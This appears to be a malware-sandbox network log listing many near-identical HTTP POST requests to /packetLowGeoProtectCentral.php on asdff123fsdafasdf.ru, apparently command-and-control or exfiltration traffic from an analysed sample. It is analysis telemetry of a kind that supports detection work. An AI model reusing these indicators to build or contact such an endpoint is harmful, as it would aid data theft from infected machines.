Source: global traffic	HTTP traffic detected: POST /packetLowGeoProtectCentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: asdff123fsdafasdf.ruContent-Length: 2516Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /packetLowGeoProtectCentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: asdff123fsdafasdf.ruContent-Length: 2512Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /packetLowGeoProtectCentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: asdff123fsdafasdf.ruContent-Length: 1380Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /packetLowGeoProtectCentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: asdff123fsdafasdf.ruContent-Length: 2516Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /packetLowGeoProtectCentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: asdff123fsdafasdf.ruContent-Length: 2516Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /packetLowGeoProtectCentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: asdff123fsdafasdf.ruContent-Length: 2516Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /packetLowGeoProtectCentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: asdff123fsdafasdf.ruContent-Length: 2516Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /packetLowGeoProtectCentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: asdff123fsdafasdf.ruContent-Length: 2516Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /packetLowGeoProtectCentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: asdff123fsdafasdf.ruContent-Length: 2516Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /packetLowGeoProtectCentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: asdff123fsdafasdf.ruContent-Length: 2516Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /packetLowGeoProtectCentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: asdff123fsdafasdf.ruContent-Length: 1392Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /packetLowGeoProtectCentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: asdff123fsdafasdf.ruContent-Length: 2516Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /packetLowGeoProtectCentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: asdff123fsdafasdf.ruContent-Length: 2516Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /packetLowGeoProtectCentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: asdff123fsdafasdf.ruContent-Length: 2516Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /packetLowGeoProtectCentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: asdff123fsdafasdf.ruContent-Length: 2516Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /packetLowGeoProtectCentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: asdff123fsdafasdf.ruContent-Length: 2512Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /packetLowGeoProtectCentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: asdff123fsdafasdf.ruContent-Length: 2516Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /packetLowGeoProtectCentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: asdff123fsdafasdf.ruContent-Length: 2516Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /packetLowGeoProtectCentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: asdff123fsdafasdf.ruContent-Length: 1392Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /packetLowGeoProtectCentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: asdff123fsdafasdf.ruContent-Length: 2516Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /packetLowGeoProtectCentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: asdff123fsdafasdf.ruContent-Length: 2516Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /packetLowGeoProtectCentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: asdff123fsdafasdf.ruContent-Length: 2512Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /packetLowGeoProtectCentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: asdff123fsdafasdf.ruContent-Length: 2516Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /packetLowGeoProtectCentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: asdff123fsdafasdf.ruContent-Length: 2516Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /packetLowGeoProtectCentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: asdff123fsdafasdf.ruContent-Length: 2516Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /packetLowGeoProtectCentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: asdff123fsdafasdf.ruContent-Length: 2512Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /packetLowGeoProtectCentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: asdff123fsdafasdf.ruContent-Length: 2516Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /packetLowGeoProtectCentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: asdff123fsdafasdf.ruContent-Length: 1392Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /packetLowGeoProtectCentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: asdff123fsdafasdf.ruContent-Length: 2516Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /packetLowGeoProtectCentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: asdff123fsdafasdf.ruContent-Length: 2516Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /packetLowGeoProtectCentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: asdff123fsdafasdf.ruContent-Length: 2516Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /packetLowGeoProtectCentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: asdff123fsdafasdf.ruContent-Length: 2516Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /packetLowGeoProtectCentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: asdff123fsdafasdf.ruContent-Length: 2516Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /packetLowGeoProtectCentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: asdff123fsdafasdf.ruContent-Length: 2516Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /packetLowGeoProtectCentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: asdff123fsdafasdf.ruContent-Length: 1392Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /packetLowGeoProtectCentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: asdff123fsdafasdf.ruContent-Length: 2512Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /packetLowGeoProtectCentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: asdff123fsdafasdf.ruContent-Length: 2516Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /packetLowGeoProtectCentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: asdff123fsdafasdf.ruContent-Length: 2516Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /packetLowGeoProtectCentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: asdff123fsdafasdf.ruContent-Length: 2516Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /packetLowGeoProtectCentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: asdff123fsdafasdf.ruContent-Length: 2516Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /packetLowGeoProtectCentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: asdff123fsdafasdf.ruContent-Length: 2516Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /packetLowGeoProtectCentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: asdff123fsdafasdf.ruContent-Length: 2516Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /packetLowGeoProtectCentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: asdff123fsdafasdf.ruContent-Length: 1364Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /packetLowGeoProtectCentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: asdff123fsdafasdf.ruContent-Length: 2516Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /packetLowGeoProtectCentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: asdff123fsdafasdf.ruContent-Length: 2516Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /packetLowGeoProtectCentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: asdff123fsdafasdf.ruContent-Length: 2516Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /packetLowGeoProtectCentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: asdff123fsdafasdf.ruContent-Length: 2516Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /packetLowGeoProtectCentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: asdff123fsdafasdf.ruContent-Length: 2516Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /packetLowGeoProtectCentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: asdff123fsdafasdf.ruContent-Length: 2516Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /packetLowGeoProtectCentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: asdff123fsdafasdf.ruContent-Length: 2516Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /packetLowGeoProtectCentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: asdff123fsdafasdf.ruContent-Length: 1392Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /packetLowGeoProtectCentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: asdff123fsdafasdf.ruContent-Length: 2516Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /packetLowGeoProtectCentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: asdff123fsdafasdf.ruContent-Length: 2516Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /packetLowGeoProtectCentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: asdff123fsdafasdf.ruContent-Length: 2516Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /packetLowGeoProtectCentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: asdff123fsdafasdf.ruContent-Length: 2516Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /packetLowGeoProtectCentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: asdff123fsdafasdf.ruContent-Length: 2516Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /packetLowGeoProtectCentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: asdff123fsdafasdf.ruContent-Length: 2516Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /packetLowGeoProtectCentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: asdff123fsdafasdf.ruContent-Length: 2516Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /packetLowGeoProtectCentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: asdff123fsdafasdf.ruContent-Length: 1392Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /packetLowGeoProtectCentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: asdff123fsdafasdf.ruContent-Length: 2516Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /packetLowGeoProtectCentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: asdff123fsdafasdf.ruContent-Length: 2516Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /packetLowGeoProtectCentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: asdff123fsdafasdf.ruContent-Length: 2516Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /packetLowGeoProtectCentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: asdff123fsdafasdf.ruContent-Length: 2516Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /packetLowGeoProtectCentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: asdff123fsdafasdf.ruContent-Length: 2516Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /packetLowGeoProtectCentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: asdff123fsdafasdf.ruContent-Length: 2512Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /packetLowGeoProtectCentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: asdff123fsdafasdf.ruContent-Length: 2516Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /packetLowGeoProtectCentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: asdff123fsdafasdf.ruContent-Length: 1392Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /packetLowGeoProtectCentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: asdff123fsdafasdf.ruContent-Length: 2516Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /packetLowGeoProtectCentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: asdff123fsdafasdf.ruContent-Length: 2516Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /packetLowGeoProtectCentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: asdff123fsdafasdf.ruContent-Length: 2516Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /packetLowGeoProtectCentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: asdff123fsdafasdf.ruContent-Length: 2516Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /packetLowGeoProtectCentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: asdff123fsdafasdf.ruContent-Length: 2516Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /packetLowGeoProtectCentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: asdff123fsdafasdf.ruContent-Length: 2512Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /packetLowGeoProtectCentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: asdff123fsdafasdf.ruContent-Length: 1380Expect: 100-continueConnection: Keep-Alive
